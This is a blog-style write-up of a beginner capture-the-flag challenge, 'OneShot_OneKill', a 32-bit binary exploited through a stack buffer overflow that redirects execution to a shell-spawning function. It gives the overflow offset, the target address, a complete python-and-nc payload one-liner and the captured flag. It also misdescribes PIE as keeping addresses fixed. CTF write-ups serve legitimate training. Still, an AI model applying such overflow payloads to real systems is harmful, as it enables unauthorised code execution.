Writeup for OneShot_OneKill
You have just one bullet…. kill him!
-> nc prob.vulnerable.kr 20026
-> binary
let’s have some fun with the vulnerable binaries…
step 1:
First things first !! let’s mark the binary executable. Then let’s check the mitigations on the binary then let’s decide what to do.
As this is a basic pwn challenge I would like to talk about the mitigations also…
From this, we know
-> Its a 32-bit elf (Executable and Linkable Format).
-> It uses the little-endian format
-> NX — the stack is not executable (so no shellcode placing !!)
-> PIE — the address of the functions remains the same
let’s see if we can simply overwrite the eip (instruction pointer)…
step 2:
First, let’s see the functions in the program!!
so let me fire up gdb then analyze then see what’s going on is the oneshot function!!
so this one calls the “/bin/sh” system call which basically is the shell we want. so let’s call the function.
step 3:
so let’s overwrite the eip by finding the offset in gdb peda !!
- “pattern_create 500 pat”
- then run the program
- then find the offset with “pattern_search”
so then we find our offset is at 304…
step 4:
Finally, we write our exploit
- We also found the address of the oneshot function — 0x080485a5
- It's in little-endian remember so our address — \x08\x04\x85\xa5′[::-1] (in python)
so the script !!
python -c “print ‘a’*304 + ‘\x08\x04\x85\xa5′[::-1]” | nc prob.vulnerable.kr 20026
And you get the flag
FLAG: KorNewbie{Nice_Sh0T_N3wbie_Pwner!$#}
thanks for reading guysssss
Originally published at http://tourpran.wordpress.com on November 6, 2019.